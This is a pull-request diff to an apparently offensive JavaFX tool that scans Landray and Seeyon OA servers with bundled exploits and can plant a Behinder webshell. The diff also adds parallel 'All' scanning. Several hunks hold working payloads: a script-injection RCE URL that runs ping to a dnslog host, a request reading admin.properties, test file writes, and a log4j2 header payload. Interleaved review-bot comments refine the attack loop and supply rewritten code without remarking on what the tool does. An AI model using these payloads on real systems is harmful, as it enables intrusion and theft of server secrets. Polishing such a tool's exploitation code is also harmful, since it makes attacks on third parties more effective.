Merge pull request #6 from White-hua/bingfa
Bingfa
White-hua authored Oct 15, 2022
2 parents 7457385 + c5a07cc commit 484bfa3
Showing 30 changed files with 356 additions and 131 deletions.
3 changes: 2 additions & 1 deletion src/main/java/Main.java
@@ -1,4 +1,5 @@
import cn.hutool.core.io.resource.ResourceUtil;
import java.util.Objects;
import javafx.application.Application;
import javafx.fxml.FXMLLoader;
import javafx.scene.Parent;
Expand All @@ -12,7 +13,7 @@ public void start(Stage primaryStage) throws Exception{
Parent root = FXMLLoader.load(ResourceUtil.getResource("fxml/Main.fxml"));
primaryStage.setTitle("APT");
Scene scene = new Scene(root,1280,910);
// scene.getStylesheets().add(Objects.requireNonNull(Main.class.getResource("/css/main.css")).toExternalForm());
scene.getStylesheets().add(Objects.requireNonNull(Main.class.getResource("/css/main.css")).toExternalForm());
primaryStage.setScene(scene);
primaryStage.show();
}
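Review bot: `Objects.requireNonNull(Main.class.getResource("/css/main.css"))` on the re-enabled line throws a message-less NullPointerException out of `start` whenever the stylesheet is absent from the classpath, which is hard to diagnose from the stack trace alone; `Objects.requireNonNull(Main.class.getResource("/css/main.css"), "missing classpath resource /css/main.css")` names the cause. The commented-out copy of the same line is dropped by this commit, so nothing else in the hunk needs to change. `start` begins in the hunk header and its body continues past the end of the hunk.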
121 changes: 87 additions & 34 deletions src/main/java/controller/AttController.java
@@ -1,12 +1,16 @@
package controller;

import cn.hutool.core.date.DateUtil;
import cn.hutool.core.util.StrUtil;
import core.Exploitlnterface;
import java.util.HashMap;
import java.util.Objects;
import java.util.concurrent.CompletionService;
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.ExecutorCompletionService;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.stream.IntStream;
import javafx.application.Platform;
import javafx.collections.ObservableList;
import javafx.fxml.FXML;
import javafx.scene.control.Button;
Expand All @@ -24,6 +28,8 @@ public class AttController {
private final Kinds_Exp exp = new Kinds_Exp();//初始化EXP相关数据

private final ExecutorService service = Executors.newCachedThreadPool();
private final CompletionService<HashMap<String, Object>> completionService = new ExecutorCompletionService<>(
service);
private boolean initialized = false;//是否初始化

@FXML
Expand All @@ -33,13 +39,13 @@ public class AttController {
private Button Button_Att;

@FXML
private TextArea textArea_attInfo;
private TextArea textArea_attInfo; //ATT 结果文本域

@FXML
private TextField textField_url;

@FXML
private TextArea textArea_info;
private TextArea textArea_info; //中间说明文本域

@FXML
private ChoiceBox<String> choiceBox_exp;
Expand Down Expand Up @@ -151,58 +157,105 @@ void clicked_dnslog_token(MouseEvent event) {
@FXML
void Att_clicked(MouseEvent event) { //ATT按钮
//初始清空
textArea_attInfo.setText("");
Platform.runLater(() -> {
textArea_attInfo.clear();
});
//获取url地址
String url;
String trimText = textField_url.getText().trim();
if (trimText.endsWith("/")) {
url = trimText.substring(0, trimText.length() - 1);
if (StrUtil.isBlank(textField_url.getText())) {
Platform.runLater(() -> {
textArea_attInfo.appendText("\n");
textArea_attInfo.appendText("请填写URL:");
});
return;
}
if (textField_url.getText().trim().endsWith("/")) {
url = textField_url.getText().trim()
.substring(0, textField_url.getText().trim().length() - 1);
} else {
url = trimText;
url = textField_url.getText().trim();
}

//获取需要利用的exp
String vulName = choiceBox_exp.getValue();
String vulname = choiceBox_exp.getValue();
//获取get shell按钮是否被选中
boolean getShell = radioButton_getshell.selectedProperty().get();
Boolean getshell = radioButton_getshell.selectedProperty().get();

//如果是all
if (vulName != null && vulName.equals("All")) {
textArea_attInfo.setText("");
if (vulname != null && vulname.equals("All")) {
ObservableList<String> items = choiceBox_exp.getItems();
int count = items.size() - 1;
if (count<=0) return;
CountDownLatch countDownLatch = new CountDownLatch(count);
// System.out.println("共:"+count+"个");
IntStream.range(1, items.size()).mapToObj(items::get).filter(Objects::nonNull).forEach(val -> {
try {
service.submit(() -> Kinds_Exp.getExploit(val).checkVul(url, textArea_attInfo));
} catch (Exception e) {
e.printStackTrace();
} finally {
countDownLatch.countDown();
}
});
CountDownLatch countDownLatch = new CountDownLatch(items.size() - 1);

long start = System.currentTimeMillis();
for (int i = 1; i < items.size(); i++) {
String val = items.get(i);
service.submit(() -> {
try {
String x = "线程:" + Thread.currentThread().getName() + "开始";
System.out.println(x);
Exploitlnterface exploit = Kinds_Exp.getExploit(val);
if (exploit == null) {
Platform.runLater(() -> {
textArea_attInfo.appendText("\n");
textArea_attInfo.appendText("未找到EXP:" + val);
});
throw new RuntimeException("未找到EXP");
}
if (Objects.isNull(textArea_attInfo)) {
System.out.println("NPE debugger");
}
exploit.checkVul(url, textArea_attInfo);
} catch (Exception e) {
if (e instanceof IndexOutOfBoundsException) {
System.out.println("数组下标越界异常");
}
if (e instanceof NullPointerException) {
System.out.println("NPE异常");
}
e.printStackTrace();
} finally {
String threadName = "线程:" + Thread.currentThread().getName();
// String x = threadName + "结束";
System.out.println(threadName+" spend:" + (System.currentTimeMillis() - start) + "ms");
// Platform.runLater(() -> {
// textArea_attInfo.appendText("\n");
// textArea_attInfo.appendText(x);
// textArea_attInfo.appendText("\n");
// });
countDownLatch.countDown();
}
});
}

try {
countDownLatch.await();
} catch (InterruptedException e) {
System.out.println("total spend:" + (System.currentTimeMillis() - start) + "ms");
Platform.runLater(() -> {
textArea_attInfo.appendText(
"\n\n如需获取shell请勾选 getshell并选择具体漏洞" + " " + DateUtil.now());
});
} catch (Exception e) {
e.printStackTrace();
}
textArea_attInfo.appendText("\n");
textArea_attInfo.appendText("\n");
textArea_attInfo.appendText(
"如需获取shell请勾选 getshell并选择具体漏洞" + " " + DateUtil.now());

} else if (vulName != null) {

} else if (vulname != null) {

//生成exp对应类对象
Exploitlnterface exploit = Kinds_Exp.getExploit(vulName);
Exploitlnterface exploit = Kinds_Exp.getExploit(vulname);
//检查是否存在漏洞
Boolean checkVul = exploit.checkVul(url, textArea_attInfo);
if (checkVul) {
if (!getShell) {
if (!getshell) {
textArea_attInfo.appendText("\n可以进行GetShell, 请选中getshell 单击ATT");
}
if (getShell&&exploit.getshell(url, textArea_attInfo)) {
if (getshell) {
Boolean shell_success = exploit.getshell(url, textArea_attInfo);
if (shell_success) {
textArea_attInfo.appendText("\n--Getshell 成功 若无特别说明则默认使用冰蝎4.0.3 aes--");
}


}
}

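Review bot: `countDownLatch.await()` in the All branch blocks the thread that invoked Att_clicked, and if that is the JavaFX Application Thread (as an `@FXML` mouse handler normally is) none of the `Platform.runLater` appends queued by the worker tasks can run until every task has finished, so the text area freezes and then shows all results at once; the blocking `exploit.checkVul(url, textArea_attInfo)` call in the single-exploit branch has the same effect. Moving the wait off the caller, e.g. submitting it to `service` and posting the final summary through `Platform.runLater` from there, keeps the UI responsive, and the new `completionService` field declared at the top of the hunk is not referenced anywhere in the hunk and could serve that purpose. The `throw new RuntimeException("未找到EXP")` inside the task is caught by the `catch (Exception e)` of the same lambda and merely printed, so a plain `return;` expresses the intent without a stack trace, and `if (Objects.isNull(textArea_attInfo)) { System.out.println("NPE debugger"); }` reads as leftover debugging. In the `else if (vulname != null)` branch `Kinds_Exp.getExploit(vulname)` is dereferenced without the null check the All branch performs two screens earlier. Att_clicked's body continues beyond the end of the hunk.
```java
            long start = System.currentTimeMillis();
            for (int i = 1; i < items.size(); i++) {
                String val = items.get(i);
                service.submit(() -> {
                    try {
                        Exploitlnterface exploit = Kinds_Exp.getExploit(val);
                        if (exploit == null) {
                            Platform.runLater(() -> textArea_attInfo.appendText("\n未找到EXP:" + val));
                            return;
                        }
                        exploit.checkVul(url, textArea_attInfo);
                    } catch (Exception e) {
                        e.printStackTrace();
                    } finally {
                        countDownLatch.countDown();
                    }
                });
            }
            // Wait on a worker, not on the caller, so queued Platform.runLater updates can render.
            service.submit(() -> {
                try {
                    countDownLatch.await();
                    System.out.println("total spend:" + (System.currentTimeMillis() - start) + "ms");
                    Platform.runLater(() -> textArea_attInfo.appendText(
                            "\n\n如需获取shell请勾选 getshell并选择具体漏洞" + " " + DateUtil.now()));
                } catch (InterruptedException e) {
                    Thread.currentThread().interrupt();
                }
            });
            // … unchanged: single-exploit branch …
```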
9 changes: 7 additions & 2 deletions src/main/java/exp/oa/landrayoa/landray_datajson.java
Expand Up @@ -2,6 +2,7 @@

import core.Exploitlnterface;
import java.util.HashMap;
import javafx.application.Platform;
import javafx.scene.control.TextArea;
import utils.HttpTools;
import utils.Response;
Expand All @@ -25,10 +26,14 @@ private Boolean att(String url,TextArea textArea){
String payload = "/data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=function%20test()%7B%20return%20java.lang.Runtime%7D;r=test();r.getRuntime().exec(%22ping%20-c%204%20" + shell.getRandomString() + "." + dnslog+"%22)&type=1";
Response response = HttpTools.get(url + payload, new HashMap<String, String>(), "utf-8");
if(response.getCode() == 200 && response.getText().contains("success")){
textArea.appendText("\n漏洞存在 请自行利用\n" + url + payload);
Platform.runLater(()->{
textArea.appendText("\n漏洞存在 请自行利用\n" + url + payload);
});
return true;
}else {
textArea.appendText("\n landray_datajson-RCE-漏洞不存在 (出现误报请联系作者)");
Platform.runLater(()->{
textArea.appendText("\n landray_datajson-RCE-漏洞不存在 (出现误报请联系作者)");
});
return false;
}

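Review bot: `response.getCode()` in this hunk dereferences the result of `HttpTools.get` without a null check, while the seeyonoa_main_log4j2 hunk in the same commit now guards the same helper's result with `Objects.isNull(...)`, which suggests the helper can return null; a guard such as `if (response == null) { return false; }` ahead of the status check would keep a failed request from surfacing as a NullPointerException on a worker thread. The same unguarded pattern is present in the landray_sysSearchMain, landray_treexmlTmpl, seeyonoa_ajaxBypass and seeyonoa_htmlofficeservlet hunks. The `Platform.runLater` wrapping of the `appendText` calls is the only change here and is consistent with the rest of the commit. `att`'s signature sits in the hunk header and its body continues past the end of the hunk.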
9 changes: 7 additions & 2 deletions src/main/java/exp/oa/landrayoa/landray_sysSearchMain.java
Expand Up @@ -2,6 +2,7 @@

import core.Exploitlnterface;
import java.util.HashMap;
import javafx.application.Platform;
import javafx.scene.control.TextArea;
import utils.HttpTools;
import utils.Response;
Expand All @@ -28,10 +29,14 @@ private Boolean att(String url,TextArea textArea){
String poststr = "var={\"body\":{\"file\":\"/WEB-INF/KmssConfig/admin.properties\"}}";
Response post = HttpTools.post(url + "/sys/ui/extend/varkind/custom.jsp", poststr, head, "utf-8");
if(post.getCode() == 200 && post.getText().contains("kmss.properties")) {
textArea.appendText(post.getText().replace("\n","").replace("kmss.properties.encrypt.enabled = true",""));
Platform.runLater(()->{
textArea.appendText(post.getText().replace("\n","").replace("kmss.properties.encrypt.enabled = true",""));
});
return true;
}else {
textArea.appendText("\n landray_sysSearchMain.do-RCE-漏洞不存在 (出现误报请联系作者)");
Platform.runLater(()->{
textArea.appendText("\n landray_sysSearchMain.do-RCE-漏洞不存在 (出现误报请联系作者)");
});
return false;
}
}
9 changes: 7 additions & 2 deletions src/main/java/exp/oa/landrayoa/landray_treexmlTmpl.java
Expand Up @@ -2,6 +2,7 @@

import core.Exploitlnterface;
import java.util.HashMap;
import javafx.application.Platform;
import javafx.scene.control.TextArea;
import utils.HttpTools;
import utils.Response;
Expand All @@ -26,10 +27,14 @@ private Boolean att(String url, TextArea textArea){

Response post1 = HttpTools.post(url + "/data/sys-common/treexml.tmpl", post, head, "utf-8");
if(post1.getCode() == 200 && post1.getText().contains("Landray.log")){
textArea.appendText("\n treexmlTmpl漏洞存在 请设置代理抓包 直接执行系统命令");
Platform.runLater(()->{
textArea.appendText("\n treexmlTmpl漏洞存在 请设置代理抓包 直接执行系统命令");
});
return true;
}else {
textArea.appendText("\n landray_treexmlTmpl-RCE-漏洞不存在 (出现误报请联系作者)");
Platform.runLater(()->{
textArea.appendText("\n landray_treexmlTmpl-RCE-漏洞不存在 (出现误报请联系作者)");
});
return false;
}
}
9 changes: 7 additions & 2 deletions src/main/java/exp/oa/seeyonoa/seeyonoa_ajaxBypass.java
Expand Up @@ -2,6 +2,7 @@

import core.Exploitlnterface;
import java.util.HashMap;
import javafx.application.Platform;
import javafx.scene.control.TextArea;
import utils.HttpTools;
import utils.Response;
Expand All @@ -23,10 +24,14 @@ private Boolean att(String url,TextArea textArea){
HttpTools.get(url + "/seeyon/ajax.do;Jsessionid=getAjaxDataServlet?method=ajaxAction&managerMethod=validate&managerName=formulaManager&requestCompress=gzip&S=ajaxColManager&M=colDelLock&arguments=" + payload, new HashMap<String, String>(), "utf-8");
Response response1 = HttpTools.get(url + "/seeyon/nishizhu.txt", new HashMap<String, String>(), "utf-8");
if(response1.getCode() == 200 && response1.getText().contains(shell.test_payload)){
textArea.appendText("\n 漏洞存在 测试文件写入成功\n" + url + "/seeyon/nishizhu.txt");
Platform.runLater(()->{
textArea.appendText("\n 漏洞存在 测试文件写入成功\n" + url + "/seeyon/nishizhu.txt");
});
return true;
}else {
textArea.appendText("\n seeyonoa_ajaxBypass-RCE-漏洞不存在 (出现误报请联系作者)");
Platform.runLater(()->{
textArea.appendText("\n seeyonoa_ajaxBypass-RCE-漏洞不存在 (出现误报请联系作者)");
});
return false;
}
}
13 changes: 10 additions & 3 deletions src/main/java/exp/oa/seeyonoa/seeyonoa_htmlofficeservlet.java
Expand Up @@ -2,6 +2,7 @@

import core.Exploitlnterface;
import java.util.HashMap;
import javafx.application.Platform;
import javafx.scene.control.TextArea;
import utils.HttpTools;
import utils.Response;
Expand Down Expand Up @@ -36,14 +37,20 @@ private Boolean att(String url,TextArea textArea){
if(post.getCode() == 200 && post.getText().contains(shell.test_payload)){
Response response = HttpTools.get(url + "/seeyon/nishizhu.txt", new HashMap<String, String>(), "utf-8");
if(response.getCode() == 200 && response.getText().contains(shell.test_payload)) {
textArea.appendText("\n 漏洞存在 测试文件写入成功\n " + url + "/seeyon/nishizhu.txt");
Platform.runLater(()->{
textArea.appendText("\n 漏洞存在 测试文件写入成功\n " + url + "/seeyon/nishizhu.txt");
});
return true;
}else {
textArea.appendText("\n seeyonoa_htmlofficeservlet-RCE-漏洞不存在 (出现误报请联系作者)");
Platform.runLater(()->{
textArea.appendText("\n seeyonoa_htmlofficeservlet-RCE-漏洞不存在 (出现误报请联系作者)");
});
return false;
}
}else {
textArea.appendText("\n seeyonoa_htmlofficeservlet-RCE-漏洞不存在 (出现误报请联系作者)");
Platform.runLater(()->{
textArea.appendText("\n seeyonoa_htmlofficeservlet-RCE-漏洞不存在 (出现误报请联系作者)");
});
return false;
}
}
31 changes: 27 additions & 4 deletions src/main/java/exp/oa/seeyonoa/seeyonoa_main_log4j2.java
Expand Up @@ -2,6 +2,9 @@

import core.Exploitlnterface;
import java.util.HashMap;
import java.util.Objects;
import java.util.concurrent.TimeUnit;
import javafx.application.Platform;
import javafx.scene.control.TextArea;
import utils.HttpTools;
import utils.Response;
Expand All @@ -28,20 +31,40 @@ private Boolean att(String url,TextArea textArea){
head.put("X-Api-Version", log4jpayload);

Response dns_le1 = HttpTools.get(shell.readFile(shell.dnscofpath), new HashMap<String, String>(), "utf-8");
try {
TimeUnit.SECONDS.sleep(3);
} catch (InterruptedException e) {
e.printStackTrace();
}
if (Objects.isNull(dns_le1)|| Objects.isNull(dns_le1.getText())){
// throw new RuntimeException("当前那EXP返回 null");
Platform.runLater(()->{
textArea.appendText("\n");
textArea.appendText("seeyonoa_main_log4j2-RCE 当前那EXP返回 null");
});
return false;
}
int dns_1 = dns_le1.getText().length();

Response response = HttpTools.get(url + "/seeyon/main.do", head, "utf-8");
try { Thread.sleep (5000) ;
} catch (Exception ie){}
try {
TimeUnit.SECONDS.sleep(5);
} catch (InterruptedException e) {
e.printStackTrace();
}

Response dns_le2 = HttpTools.get(shell.readFile(shell.dnscofpath), new HashMap<String, String>(), "utf-8");
int dns_2 = dns_le2.getText().length();

if(dns_2 > dns_1 && response.getCode() == 200){
textArea.appendText("\n log4j2漏洞存在-收到dnslog回显,请使用VPS自行利用");
Platform.runLater(()->{
textArea.appendText("\n log4j2漏洞存在-收到dnslog回显,请使用VPS自行利用");
});
return true;
}else {
textArea.appendText("\n seeyonoa_main_log4j2-RCE-漏洞不存在 (出现误报请联系作者)");
Platform.runLater(()->{
textArea.appendText("\n seeyonoa_main_log4j2-RCE-漏洞不存在 (出现误报请联系作者)");
});
return false;
}

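Review bot: `dns_le2.getText()` is dereferenced unguarded even though the same hunk now checks `dns_le1` and its text for null a few lines earlier; the second read should get the matching guard, `if (Objects.isNull(dns_le2) || Objects.isNull(dns_le2.getText())) { return false; }`, before `dns_2` is computed. Both new `catch (InterruptedException e)` blocks only print the trace and fall through, so an interrupted worker keeps running as if nothing happened; `Thread.currentThread().interrupt(); return false;` would honor the interrupt. The added 3- and 5-second sleeps run on whichever thread calls `att`, so if the single-exploit path invokes it from the JavaFX thread the window will stall for roughly eight seconds. `att`'s body continues outside the hunk.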